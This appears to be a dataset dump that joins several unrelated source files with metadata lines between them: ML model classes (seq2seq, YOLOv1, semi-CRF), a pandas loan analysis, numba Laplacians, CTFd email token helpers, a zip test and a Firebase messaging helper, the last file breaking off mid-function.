class EncoderDecoderModel(object):
task_name = 'seq2seq'
def save(self, model_base):
pass
def __init__(self, *args, **kwargs):
super(EncoderDecoderModel, self).__init__()
@staticmethod
def load(basename, **kwargs):
pass
@classmethod
def create(cls, src_embeddings, dst_embedding, **kwargs):
pass
def create_loss(self):
pass
def predict(self, source_dict, **kwargs):
pass
# deprecated: use predict
def run(self, source_dict, **kwargs):
logger.warning('`run` is deprecated, use `predict` instead.')
return self.predict(source_dict, **kwargs)
|
en
| 0.859204
|
Register a function as a plug-in Register a function as a plug-in Register a function as a plug-in Register a function as a plug-in # Sniff state to see if we need to import things # There won't be a module for pytorch (there is no state file to load). # Allow user to override model type (for back compat with old api), backoff # to the model type in the state file or to default. # TODO: Currently in pytorch all models are always reloaded with the load # classmethod with a default model class. This is fine given how simple pyt # loading is but it could cause problems if a model has a custom load Text classifier Provide an interface to DNN classifiers that use word lookup tables. Save this model out :param basename: Name of the model, not including suffixes :return: None Load the model from a basename, including directory :param basename: Name of the model, not including suffixes :param kwargs: Anything that is useful to optimize experience for a specific framework :return: A newly created model Classify a batch of text with whatever features the model can use from the batch_dict. The indices correspond to get_vocab().get('word', 0) :param batch_dict: This normally contains `x`, a `BxT` tensor of indices. Some classifiers and readers may provide other features :return: A list of lists of tuples (label, value) # deprecated: use predict Return a list of labels, where the offset within the list is the location in a confusion matrix, etc. :return: A list of the labels for the decision Structured prediction classifier, AKA a tagger This class takes a temporal signal, represented as words over time, and characters of words and generates an output label for each time. This type of model is used for POS tagging or any type of chunking (e.g. NER, POS chunks, slot-filling) # deprecated: use predict
| 2.215983
| 2
|
-Loan-Approval-Analysis-/code.py
|
amrapali10/ga-learner-dsmp-repo
| 0
|
6627602
|
<reponame>amrapali10/ga-learner-dsmp-repo
# --------------
# Import packages
import numpy as np
import pandas as pd
from scipy.stats import mode
# code starts here
df = pd.read_csv(path)
bank = pd.DataFrame(df)
categorical_var = df.select_dtypes(include = 'object')
print(categorical_var)
print('='*50)
numerical_var = df.select_dtypes(include = 'number')
print(numerical_var)
# code ends here
# --------------
# code starts here
banks = bank.drop('Loan_ID', axis = 1)
print(banks.isnull().sum())
print('='*50)
bank_mode = banks.mode()
#print(bank_mode)
for column in banks.columns:
banks[column].fillna(banks[column].mode()[0], inplace=True)
#banks = banks.fillna(banks.mode())
print(banks)
#code ends here
# --------------
# Code starts here
avg_loan_amount = pd.pivot_table(banks, index=['Gender','Married','Self_Employed'],values = 'LoanAmount', aggfunc = np.mean)
print(avg_loan_amount)
# code ends here
# --------------
# code starts here
loan_approved_se = len( banks[(banks['Self_Employed'] == 'Yes') & (banks['Loan_Status'] == 'Y')])
print(loan_approved_se)
print('='*50)
loan_approved_nse = len(banks[(banks['Self_Employed'] == 'No') & (banks['Loan_Status']=='Y')])
print(loan_approved_nse)
print('='*50)
Loan_Status = 614
percentage_se = loan_approved_se/Loan_Status*100
print(percentage_se)
print('='*50)
percentage_nse = loan_approved_nse/Loan_Status*100
print(percentage_nse)
# code ends here
# --------------
# code starts here
loan_term = banks['Loan_Amount_Term'].apply(lambda x:x/12 )
print(len(loan_term))
print('='*50)
big_loan_term =len(banks[loan_term >= 25])
print(big_loan_term)
# code ends here
# --------------
# code starts here
loan_groupby = banks.groupby('Loan_Status')['ApplicantIncome','Credit_History']
mean_values = loan_groupby.mean()
print(loan_groupby)
print('='*50)
print(mean_values)
# code ends here
|
# --------------
# Import packages
import numpy as np
import pandas as pd
from scipy.stats import mode
# code starts here
df = pd.read_csv(path)
bank = pd.DataFrame(df)
categorical_var = df.select_dtypes(include = 'object')
print(categorical_var)
print('='*50)
numerical_var = df.select_dtypes(include = 'number')
print(numerical_var)
# code ends here
# --------------
# code starts here
banks = bank.drop('Loan_ID', axis = 1)
print(banks.isnull().sum())
print('='*50)
bank_mode = banks.mode()
#print(bank_mode)
for column in banks.columns:
banks[column].fillna(banks[column].mode()[0], inplace=True)
#banks = banks.fillna(banks.mode())
print(banks)
#code ends here
# --------------
# Code starts here
avg_loan_amount = pd.pivot_table(banks, index=['Gender','Married','Self_Employed'],values = 'LoanAmount', aggfunc = np.mean)
print(avg_loan_amount)
# code ends here
# --------------
# code starts here
loan_approved_se = len( banks[(banks['Self_Employed'] == 'Yes') & (banks['Loan_Status'] == 'Y')])
print(loan_approved_se)
print('='*50)
loan_approved_nse = len(banks[(banks['Self_Employed'] == 'No') & (banks['Loan_Status']=='Y')])
print(loan_approved_nse)
print('='*50)
Loan_Status = 614
percentage_se = loan_approved_se/Loan_Status*100
print(percentage_se)
print('='*50)
percentage_nse = loan_approved_nse/Loan_Status*100
print(percentage_nse)
# code ends here
# --------------
# code starts here
loan_term = banks['Loan_Amount_Term'].apply(lambda x:x/12 )
print(len(loan_term))
print('='*50)
big_loan_term =len(banks[loan_term >= 25])
print(big_loan_term)
# code ends here
# --------------
# code starts here
loan_groupby = banks.groupby('Loan_Status')['ApplicantIncome','Credit_History']
mean_values = loan_groupby.mean()
print(loan_groupby)
print('='*50)
print(mean_values)
# code ends here
|
en
| 0.540579
|
# -------------- # Import packages # code starts here # code ends here # -------------- # code starts here #print(bank_mode) #banks = banks.fillna(banks.mode()) #code ends here # -------------- # Code starts here # code ends here # -------------- # code starts here # code ends here # -------------- # code starts here # code ends here # -------------- # code starts here # code ends here
| 3.031501
| 3
|
Labs/Lab07/src/laplacian.py
|
ethank5149/PurduePHYS580
| 0
|
6627603
|
<reponame>ethank5149/PurduePHYS580
from numba import jit
import numpy as np
@jit
def laplacian_1d(n):
return np.diag(2 * np.ones(n - 2)) + \
np.diag(-np.ones(n - 3), 1) + \
np.diag(-np.ones(n - 3), -1)
@jit
def laplacian_2d(n):
return np.kron(np.eye(n - 2), laplacian_1d(n)) + \
np.kron(laplacian_1d(n), np.eye(n - 2))
# from scipy.sparse import diags, kron, eye
# @jit
# def laplacian_1d(n):
# return diags([2 * np.ones(n - 2), -np.ones(n - 3), -np.ones(n - 3)], [0, 1, -1])
# @jit
# def laplacian_2d(n):
# return kron(eye(n - 2), laplacian_1d(n)) + \
# kron(laplacian_1d(n), eye(n - 2))
|
from numba import jit
import numpy as np
@jit
def laplacian_1d(n):
return np.diag(2 * np.ones(n - 2)) + \
np.diag(-np.ones(n - 3), 1) + \
np.diag(-np.ones(n - 3), -1)
@jit
def laplacian_2d(n):
return np.kron(np.eye(n - 2), laplacian_1d(n)) + \
np.kron(laplacian_1d(n), np.eye(n - 2))
# from scipy.sparse import diags, kron, eye
# @jit
# def laplacian_1d(n):
# return diags([2 * np.ones(n - 2), -np.ones(n - 3), -np.ones(n - 3)], [0, 1, -1])
# @jit
# def laplacian_2d(n):
# return kron(eye(n - 2), laplacian_1d(n)) + \
# kron(laplacian_1d(n), eye(n - 2))
|
en
| 0.204216
|
# from scipy.sparse import diags, kron, eye # @jit # def laplacian_1d(n): # return diags([2 * np.ones(n - 2), -np.ones(n - 3), -np.ones(n - 3)], [0, 1, -1]) # @jit # def laplacian_2d(n): # return kron(eye(n - 2), laplacian_1d(n)) + \ # kron(laplacian_1d(n), eye(n - 2))
| 2.711412
| 3
|
YOLOv1/model.py
|
aryaman4152/model-implementations-PyTorch
| 1
|
6627604
|
<gh_stars>1-10
import torch
import torch.nn as nn
class Convolution(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, padding, stride):
super(Convolution, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding=padding,
stride=stride)
self.Lrelu = nn.LeakyReLU(0.1)
def forward(self, x):
x = self.conv(x)
x = self.Lrelu(x)
return x
class YOLOv1(nn.Module):
def __init__(self):
super(YOLOv1, self).__init__()
self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
# Section 1
# Tried all paddings from 0, 3 gives correct output shape
self.section_1_conv = Convolution(in_channels=3, out_channels=64, kernel_size=7, padding=3, stride=2)
# Section 2
self.section_2_conv = Convolution(in_channels=64, out_channels=192, kernel_size=3, stride=1, padding='same') #not strided conv
# Section 3
self.section_3_conv = nn.ModuleList([
Convolution(in_channels=192, out_channels=128, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=128, out_channels=256, kernel_size=3, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=256, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
])
# section 4
self.section_4_conv_1 = nn.ModuleList([
Convolution(in_channels=512, out_channels=256, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
])
self.section_4_conv_2 = nn.ModuleList([
Convolution(in_channels=512, out_channels=512, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
])
# section 5
self.section_5_conv_1 = nn.ModuleList([
Convolution(in_channels=1024, out_channels=512, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
])
self.section_5_conv_2 = nn.ModuleList([
Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same'),
Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=2, padding=1)
])
# section 6
self.section_6_conv = Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same')
# fc section
self.fc = nn.Sequential(
nn.Flatten(),
nn.Linear(1024*7*7, 4096),
nn.LeakyReLU(0.1),
nn.Linear(4096, 7*7*30),
nn.LeakyReLU(0.1)
)
def forward(self, x):
x = self.section_1_conv(x)
x = self.pool(x)
x = self.section_2_conv(x)
x = self.pool(x)
for sec_3 in self.section_3_conv:
x = sec_3(x)
x = self.pool(x)
for i in range(0,4):
for sec_4_1 in self.section_4_conv_1:
x = sec_4_1(x)
for sec_4 in self.section_4_conv_2:
x = sec_4(x)
x = self.pool(x)
for i in range(0,2):
for sec_5_1 in self.section_5_conv_1:
x = sec_5_1(x)
for sec_5 in self.section_5_conv_2:
x = sec_5(x)
x = self.section_6_conv(x)
x = self.section_6_conv(x)
x = self.fc(x)
x = torch.reshape(x, (7,7,30)) # reshape output
return x
|
import torch
import torch.nn as nn
class Convolution(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, padding, stride):
super(Convolution, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding=padding,
stride=stride)
self.Lrelu = nn.LeakyReLU(0.1)
def forward(self, x):
x = self.conv(x)
x = self.Lrelu(x)
return x
class YOLOv1(nn.Module):
def __init__(self):
super(YOLOv1, self).__init__()
self.pool = nn.MaxPool2d(kernel_size=2, stride=2)
# Section 1
# Tried all paddings from 0, 3 gives correct output shape
self.section_1_conv = Convolution(in_channels=3, out_channels=64, kernel_size=7, padding=3, stride=2)
# Section 2
self.section_2_conv = Convolution(in_channels=64, out_channels=192, kernel_size=3, stride=1, padding='same') #not strided conv
# Section 3
self.section_3_conv = nn.ModuleList([
Convolution(in_channels=192, out_channels=128, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=128, out_channels=256, kernel_size=3, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=256, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
])
# section 4
self.section_4_conv_1 = nn.ModuleList([
Convolution(in_channels=512, out_channels=256, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=256, out_channels=512, kernel_size=3, stride=1, padding='same')
])
self.section_4_conv_2 = nn.ModuleList([
Convolution(in_channels=512, out_channels=512, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
])
# section 5
self.section_5_conv_1 = nn.ModuleList([
Convolution(in_channels=1024, out_channels=512, kernel_size=1, stride=1, padding='same'),
Convolution(in_channels=512, out_channels=1024, kernel_size=3, stride=1, padding='same')
])
self.section_5_conv_2 = nn.ModuleList([
Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same'),
Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=2, padding=1)
])
# section 6
self.section_6_conv = Convolution(in_channels=1024, out_channels=1024, kernel_size=3, stride=1, padding='same')
# fc section
self.fc = nn.Sequential(
nn.Flatten(),
nn.Linear(1024*7*7, 4096),
nn.LeakyReLU(0.1),
nn.Linear(4096, 7*7*30),
nn.LeakyReLU(0.1)
)
def forward(self, x):
x = self.section_1_conv(x)
x = self.pool(x)
x = self.section_2_conv(x)
x = self.pool(x)
for sec_3 in self.section_3_conv:
x = sec_3(x)
x = self.pool(x)
for i in range(0,4):
for sec_4_1 in self.section_4_conv_1:
x = sec_4_1(x)
for sec_4 in self.section_4_conv_2:
x = sec_4(x)
x = self.pool(x)
for i in range(0,2):
for sec_5_1 in self.section_5_conv_1:
x = sec_5_1(x)
for sec_5 in self.section_5_conv_2:
x = sec_5(x)
x = self.section_6_conv(x)
x = self.section_6_conv(x)
x = self.fc(x)
x = torch.reshape(x, (7,7,30)) # reshape output
return x
|
en
| 0.651285
|
# Section 1 # Tried all paddings from 0, 3 gives correct output shape # Section 2 #not strided conv # Section 3 # section 4 # section 5 # section 6 # fc section # reshape output
| 2.808194
| 3
|
scripts/min_max.py
|
BLZ11/data_stats
| 0
|
6627605
|
<reponame>BLZ11/data_stats<gh_stars>0
"""Fake module that supposedly computes the minimum and maximum values of dependent variable y"""
import numpy as np
def min_max(y_data):
"""Calculate the second-to-last mininum and second-to-last maximum valuse of dependent variable y"""
sort_data = np.sort(y_data)
minimum = sort_data[1] # second-to-last mininum value
maximum = sort_data[sort_data.shape[0] - 2] # second-to-last maximum value
return (minimum, maximum)
|
"""Fake module that supposedly computes the minimum and maximum values of dependent variable y"""
import numpy as np
def min_max(y_data):
"""Calculate the second-to-last mininum and second-to-last maximum valuse of dependent variable y"""
sort_data = np.sort(y_data)
minimum = sort_data[1] # second-to-last mininum value
maximum = sort_data[sort_data.shape[0] - 2] # second-to-last maximum value
return (minimum, maximum)
|
en
| 0.687555
|
Fake module that supposedly computes the minimum and maximum values of dependent variable y Calculate the second-to-last mininum and second-to-last maximum valuse of dependent variable y # second-to-last mininum value # second-to-last maximum value
| 3.431555
| 3
|
CTFd/utils/email/__init__.py
|
AIica/Crypto-2020
| 0
|
6627606
|
<reponame>AIica/Crypto-2020
from flask import current_app as app, url_for
from CTFd.utils import get_config, get_app_config
from CTFd.utils.config import get_mail_provider, mailserver
from CTFd.utils.encoding import base64decode, base64encode
from CTFd.utils.email import mailgun, smtp
from itsdangerous import TimedSerializer, BadTimeSignature, Signer, BadSignature
import re
EMAIL_REGEX = r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)"
def sendmail(addr, text):
provider = get_mail_provider()
if provider == 'smtp':
return smtp.sendmail(addr, text)
if provider == 'mailgun':
return mailgun.sendmail(addr, text)
return False, "No mail settings configured"
def forgot_password(email, team_name):
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(team_name)
text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), base64encode(token))
sendmail(email, text)
def verify_email_address(addr):
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(addr)
text = """Please click the following link to confirm your email address for {ctf_name}: {url}/{token}""".format(
ctf_name=get_config('ctf_name'),
url=url_for('auth.confirm', _external=True),
token=base64encode(token)
)
sendmail(addr, text)
def check_email_format(email):
return bool(re.match(EMAIL_REGEX, email))
|
from flask import current_app as app, url_for
from CTFd.utils import get_config, get_app_config
from CTFd.utils.config import get_mail_provider, mailserver
from CTFd.utils.encoding import base64decode, base64encode
from CTFd.utils.email import mailgun, smtp
from itsdangerous import TimedSerializer, BadTimeSignature, Signer, BadSignature
import re
EMAIL_REGEX = r"(^[^@\s]+@[^@\s]+\.[^@\s]+$)"
def sendmail(addr, text):
provider = get_mail_provider()
if provider == 'smtp':
return smtp.sendmail(addr, text)
if provider == 'mailgun':
return mailgun.sendmail(addr, text)
return False, "No mail settings configured"
def forgot_password(email, team_name):
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(team_name)
text = """Did you initiate a password reset? Click the following link to reset your password:
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), base64encode(token))
sendmail(email, text)
def verify_email_address(addr):
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(addr)
text = """Please click the following link to confirm your email address for {ctf_name}: {url}/{token}""".format(
ctf_name=get_config('ctf_name'),
url=url_for('auth.confirm', _external=True),
token=base64encode(token)
)
sendmail(addr, text)
def check_email_format(email):
return bool(re.match(EMAIL_REGEX, email))
|
en
| 0.829658
|
Did you initiate a password reset? Click the following link to reset your password: {0}/{1} Please click the following link to confirm your email address for {ctf_name}: {url}/{token}
| 2.428565
| 2
|
_unittests/ut_filehelper/test_winzipfile.py
|
Pandinosaurus/pyquickhelper
| 18
|
6627607
|
"""
@brief test log(time=2s)
@author <NAME>
"""
import sys
import os
import unittest
from pyquickhelper.loghelper import fLOG
from pyquickhelper.filehelper.winzipfile import WinZipFile
class TestWinZipFile(unittest.TestCase):
def test_winzipfile(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
this = os.path.abspath(os.path.dirname(__file__))
data = os.path.join(this, "data", "loghelper.zip")
nb = 0
with WinZipFile(data, "r") as f:
names = f.infolist()
for name in names:
self.assertIn("/", name.filename)
c = f.read(name.filename)
if len(c) == 0 and not name.filename.endswith("/") and "__init__" not in name.filename:
raise Exception("empty file '{0}'".format(name.filename))
nb += 1
self.assertTrue(nb > 0)
if __name__ == "__main__":
unittest.main()
|
"""
@brief test log(time=2s)
@author <NAME>
"""
import sys
import os
import unittest
from pyquickhelper.loghelper import fLOG
from pyquickhelper.filehelper.winzipfile import WinZipFile
class TestWinZipFile(unittest.TestCase):
def test_winzipfile(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
this = os.path.abspath(os.path.dirname(__file__))
data = os.path.join(this, "data", "loghelper.zip")
nb = 0
with WinZipFile(data, "r") as f:
names = f.infolist()
for name in names:
self.assertIn("/", name.filename)
c = f.read(name.filename)
if len(c) == 0 and not name.filename.endswith("/") and "__init__" not in name.filename:
raise Exception("empty file '{0}'".format(name.filename))
nb += 1
self.assertTrue(nb > 0)
if __name__ == "__main__":
unittest.main()
|
en
| 0.312813
|
@brief test log(time=2s) @author <NAME>
| 2.737492
| 3
|
firebase/fcm.py
|
BraydenKO/RamLife
| 3
|
6627608
|
<filename>firebase/fcm.py
from firebase_admin import initialize_app, credentials, messaging as FCM
print ("Initializing...")
initialize_app (credentials.Certificate(path))
def get_message(command, topic): return FCM.Message(
data = {
"command": command,
"collapseKey": topic,
"click_action": "FLUTTER_NOTIFICATION_CLICK",
},
topic = topic
)
def send_message(message):
return FCM.send(message)
|
<filename>firebase/fcm.py
from firebase_admin import initialize_app, credentials, messaging as FCM
print ("Initializing...")
initialize_app (credentials.Certificate(path))
def get_message(command, topic): return FCM.Message(
data = {
"command": command,
"collapseKey": topic,
"click_action": "FLUTTER_NOTIFICATION_CLICK",
},
topic = topic
)
def send_message(message):
return FCM.send(message)
|
none
| 1
| 2.42345
| 2
|
|
pyseqlab/hosemi_crf_ad.py
|
bratao/-PySeqLab
| 6
|
6627609
|
"""
@author: <NAME> <<EMAIL>>
"""
import numpy
from .linear_chain_crf import LCRFModelRepresentation, LCRF
from .utilities import (
HOSemi_AStarSearcher,
vectorized_logsumexp,
generate_partitions,
generate_partition_boundaries,
)
class HOSemiCRFADModelRepresentation(LCRFModelRepresentation):
r"""Model representation that will hold data structures to be used in :class:`HOSemiCRF` class
Attributes:
P_codebook: set of proper prefixes of the elements in the set of patterns :attr:`Z_codebook`
e.g. {'':0, 'P':1, 'L':2, 'O':3, 'L|O':4, ...}
P_codebook_rev: reversed codebook of :attr:`P_codebook`
e.g. {0:'', 1:'P', 2:'L', 3:'O', 4:'L|O', ...}
P_len: dictionary comprising the length (i.e. number of elements) of elements in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':2, ...}
P_elems: dictionary comprising the composing elements of every prefix in :attr:`P_codebook`
e.g. {'':('',), 'P':('P',), 'L':('L',), 'O':('O',), 'L|O':('L','O'), ...}
P_numchar: dictionary comprising the number of characters for every prefix in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':3, ...}
f_transition: a dictionary representing forward transition data structure having the form:
{pi:{pky, (pk, y)}} where pi represents the longest prefix element in :attr:`P_codebook`
for pky (representing the concatenation of elements in :attr:`P_codebook` and :attr:`Y_codebook`)
pky_codebook: generate a codebook for the elements of the set PY (the product of set P and Y)
pi_pky_map: a map between P elements and PY elements
z_pky_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:[pky_elements]}
z_pi_piy_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:(pk, pky, pi)}
"""
def __init__(self):
# call super class
super().__init__()
self.P_codebook = None
self.P_codebook_rev = None
self.P_len = None
self.P_elems = None
self.P_numchar = None
self.f_transition = None
self.pky_codebook = None
self.pi_pky_map = None
self.z_pky_map = None
self.z_pi_piy_map = None
def setup_model(self, modelfeatures, states, L):
"""setup and create the model representation
Creates all maps and codebooks needed by the :class:`HOSemiCRFAD` class
Args:
modelfeatures: set of features defining the model
states: set of states (i.e. tags)
L: length of longest segment
"""
super().setup_model(modelfeatures, states, L)
def generate_instance_properties(self):
"""generate instance properties that will be later used by :class:`HOSemiCRFAD` class
"""
super().generate_instance_properties()
self.P_codebook = self.get_forward_states()
self.P_codebook_rev = self.get_P_codebook_rev()
self.P_len, self.P_elems, self.P_numchar = self.get_P_info()
self.f_transition = self.get_forward_transition()
self.pky_codebook = self.get_pky_codebook()
self.pi_pky_map = self.get_pi_pky_map()
self.z_pky_map, self.z_pi_piy_map = self.map_pky_z()
def get_forward_states(self):
"""create set of forward states (referred to set P) and map each element to unique code
P is set of proper prefixes of the elements in :attr:`Z_codebook` set
"""
Y_codebook = self.Y_codebook
Z_elems = self.Z_elems
Z_len = self.Z_len
P = {}
for z_patt in Z_elems:
elems = Z_elems[z_patt]
z_len = Z_len[z_patt]
for i in range(z_len - 1):
P["|".join(elems[: i + 1])] = 1
for y in Y_codebook:
P[y] = 1
# empty element
P[""] = 1
P_codebook = {s: i for (i, s) in enumerate(P)}
# print("P_codebook ", P_codebook)
return P_codebook
def get_P_codebook_rev(self):
"""generate reversed codebook of :attr:`P_codebook`
"""
P_codebook = self.P_codebook
P_codebook_rev = {code: pi for pi, code in P_codebook.items()}
return P_codebook_rev
def get_P_info(self):
"""get the properties of P set (proper prefixes)
"""
P_codebook = self.P_codebook
P_len = {}
P_numchar = {}
P_elems = {}
for pi in P_codebook:
elems = pi.split("|")
P_elems[pi] = elems
if pi == "":
P_len[pi] = 0
P_numchar[pi] = 0
else:
P_len[pi] = len(elems)
P_numchar[pi] = len(pi)
return (P_len, P_elems, P_numchar)
def get_forward_transition(self):
"""generate forward transition data structure
Main tasks:
- create a set PY from the product of P and Y sets
- for each element in PY, determine the longest suffix existing in set P
- include all this info in :attr:`f_transition` dictionary
"""
Y_codebook = self.Y_codebook
P_codebook = self.P_codebook
P_numchar = self.P_numchar
Z_numchar = self.Z_numchar
# pk_y= {}
# for p in P_codebook:
# for y in Y_codebook:
# pk_y[(p, y)] = 1
pk_y = {(p, y) for p in P_codebook for y in Y_codebook}
pk_y_suffix = {}
for p in P_codebook:
if p != "":
len_p = P_numchar[p]
for (pk, y) in pk_y:
ref_str = pk + "|" + y
if pk == "":
len_ref = Z_numchar[y] + 1
else:
len_ref = P_numchar[pk] + Z_numchar[y] + 1
start_pos = len_ref - len_p
if start_pos >= 0:
# check suffix relation
check = ref_str[start_pos:] == p
# check = self.check_suffix(p, ref_str)
if check:
if (pk, y) in pk_y_suffix:
pk_y_suffix[(pk, y)].append(p)
else:
pk_y_suffix[(pk, y)] = [p]
pk_y_suffix = self.keep_longest_elems(pk_y_suffix)
f_transition = {}
for (pk, y), pi in pk_y_suffix.items():
if pk == "":
elmkey = y
else:
elmkey = pk + "|" + y
if pi in f_transition:
f_transition[pi][elmkey] = (pk, y)
else:
f_transition[pi] = {elmkey: (pk, y)}
# print("f_transition ", f_transition)
return f_transition
def get_pky_codebook(self):
"""generate a codebook for the elements of the set PY (the product of set P and Y)
"""
f_transition = self.f_transition
pky_codebook = {}
counter = 0
for pi in f_transition:
for pky in f_transition[pi]:
pky_codebook[pky] = counter
counter += 1
return pky_codebook
def map_pky_z(self):
"""generate a map between elements of the Z set and PY set"""
f_transition = self.f_transition
Z_codebook = self.Z_codebook
# given that we demand to have a unigram label features then Z set will always contain Y elems
Z_numchar = self.Z_numchar
P_numchar = self.P_numchar
pky_codebook = self.pky_codebook
P_codebook = self.P_codebook
z_pi_piy = {}
z_pky = {}
for pi in f_transition:
for pky, pk_y_tup in f_transition[pi].items():
pk, y = pk_y_tup
# get number of characters in the pky
if pk == "":
len_pky = Z_numchar[y]
else:
# +1 is for the separator '|'
len_pky = P_numchar[pk] + Z_numchar[y] + 1
for z in Z_codebook:
len_z = Z_numchar[z]
# check suffix relation
start_pos = len_pky - len_z
if start_pos >= 0:
check = pky[start_pos:] == z
if check:
pky_c = pky_codebook[pky]
pk_c = P_codebook[pk]
if z in z_pky:
z_pky[z].append(pky_c)
z_pi_piy[z][0].append(pk_c)
z_pi_piy[z][1].append(pky_c)
z_pi_piy[z][2].append(P_codebook[pi])
else:
z_pky[z] = [pky_c]
z_pi_piy[z] = ([pk_c], [pky_c], [P_codebook[pi]])
return (z_pky, z_pi_piy)
def get_pi_pky_map(self):
""" generate map between P elements and PY elements
Main tasks:
- for every element in PY, determine the longest suffix in P
- determine the two components in PY (i.e. p and y element)
- represent this info in a dictionary that will be used for forward/alpha matrix
"""
f_transition = self.f_transition
pky_codebook = self.pky_codebook
P_codebook = self.P_codebook
pi_pky_map = {}
for pi in f_transition:
pi_pky_map[pi] = [[], []]
for pky, (pk, __) in f_transition[pi].items():
pi_pky_map[pi][0].append(pky_codebook[pky])
pi_pky_map[pi][1].append(P_codebook[pk])
# convert list to numpy arrays
# for i in range(2):
# pi_pky_map[pi][i] = numpy.array(pi_pky_map[pi][i])
# pi_pky_map[pi] = tuple(pi_pky_map[pi])
return pi_pky_map
def filter_activated_states(
self, activated_states, accum_active_states, curr_boundary
):
"""filter/prune states and y features
Args:
activaed_states: dictionary containing possible active states/y features
it has the form {patt_len:{patt_1, patt_2, ...}}
accum_active_states: dictionary of only possible active states by position
it has the form {pos_1:{state_1, state_2, ...}}
boundary: tuple (u,v) representing the current boundary in the sequence
"""
Z_elems = self.Z_elems
filtered_activestates = {}
# generate partition boundaries
depth_node_map = {}
generate_partitions(
curr_boundary, self.L, self.max_patt_len, {}, depth_node_map, None
)
partition_boundaries = generate_partition_boundaries(depth_node_map)
for z_len in activated_states:
if z_len == 1:
continue
if z_len in partition_boundaries:
partitions = partition_boundaries[z_len]
filtered_activestates[z_len] = set()
for partition in partitions:
for z_patt in activated_states[z_len]:
check = True
zelems = Z_elems[z_patt]
for i in range(z_len):
bound = partition[i]
if zelems[i] not in accum_active_states[bound]:
check = False
break
if check:
filtered_activestates[z_len].add(z_patt)
return filtered_activestates
class HOSemiCRFAD(LCRF):
"""higher-order semi-CRF model that uses algorithmic differentiation in gradient computation
Args:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
seqs_representer: an instance of :class:`SeqsRepresenter` class
seqs_info: dictionary holding sequences info
Keyword Arguments:
load_info_fromdisk: integer from 0 to 5 specifying number of cached data
to be kept in memory. 0 means keep everything while
5 means load everything from disk
Attributes:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
weights: a numpy vector representing feature weights
seqs_representer: an instance of :class:`pyseqlab.feature_extraction.SeqsRepresenter` class
seqs_info: dictionary holding sequences info
beam_size: determines the size of the beam for state pruning
fun_dict: a function map
def_cached_entities: a list of the names of cached entities sorted (descending)
based on estimated space required in memory
"""
def __init__(self, model, seqs_representer, seqs_info, load_info_fromdisk=5):
super().__init__(model, seqs_representer, seqs_info, load_info_fromdisk)
def cached_entitites(self, load_info_fromdisk):
"""construct list of names of cached entities in memory
"""
def_cached_entities = super().cached_entitites(load_info_fromdisk)
inmemory_info = ["alpha", "Z", "beta", "fpotential"]
def_cached_entities += inmemory_info
return def_cached_entities
def compute_fpotential(self, w, active_features):
"""compute the potential of active features in a specified boundary
Args:
w: weight vector (numpy vector)
active_features: dictionary of activated features in a specified boundary
"""
model = self.model
pky_codebook = model.pky_codebook
z_pky_map = model.z_pky_map
f_potential = numpy.zeros(len(pky_codebook))
# to consider caching the w_indx and fval as in cached_pf
for z in active_features:
w_indx, f_val = active_features[z]
potential = numpy.dot(w[w_indx], f_val)
# get all pky's in coded format where z maintains a suffix relation with them
pky_c_list = z_pky_map[z]
f_potential[pky_c_list] += potential
return f_potential
def compute_forward_vec(self, w, seq_id):
"""compute the forward matrix (alpha matrix)
Args:
w: weight vector (numpy vector)
seq_id: integer representing unique id assigned to the sequence
.. note::
activefeatures need to be loaded first in :attr:`seqs.info`
"""
model = self.model
pi_pky_map = model.pi_pky_map
P_len = model.P_len
P_codebook = model.P_codebook
T = self.seqs_info[seq_id]["T"]
L = self.model.L
activefeatures = self.seqs_info[seq_id]["activefeatures"]
alpha = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
alpha[0, P_codebook[""]] = 0
fpotential_perboundary = {}
for j in range(1, T + 1):
accumulator = (
numpy.ones((len(P_codebook), L), dtype="longdouble") * -numpy.inf
)
for d in range(L):
u = j - d
if u <= 0:
break
v = j
f_potential = self.compute_fpotential(w, activefeatures[u, v])
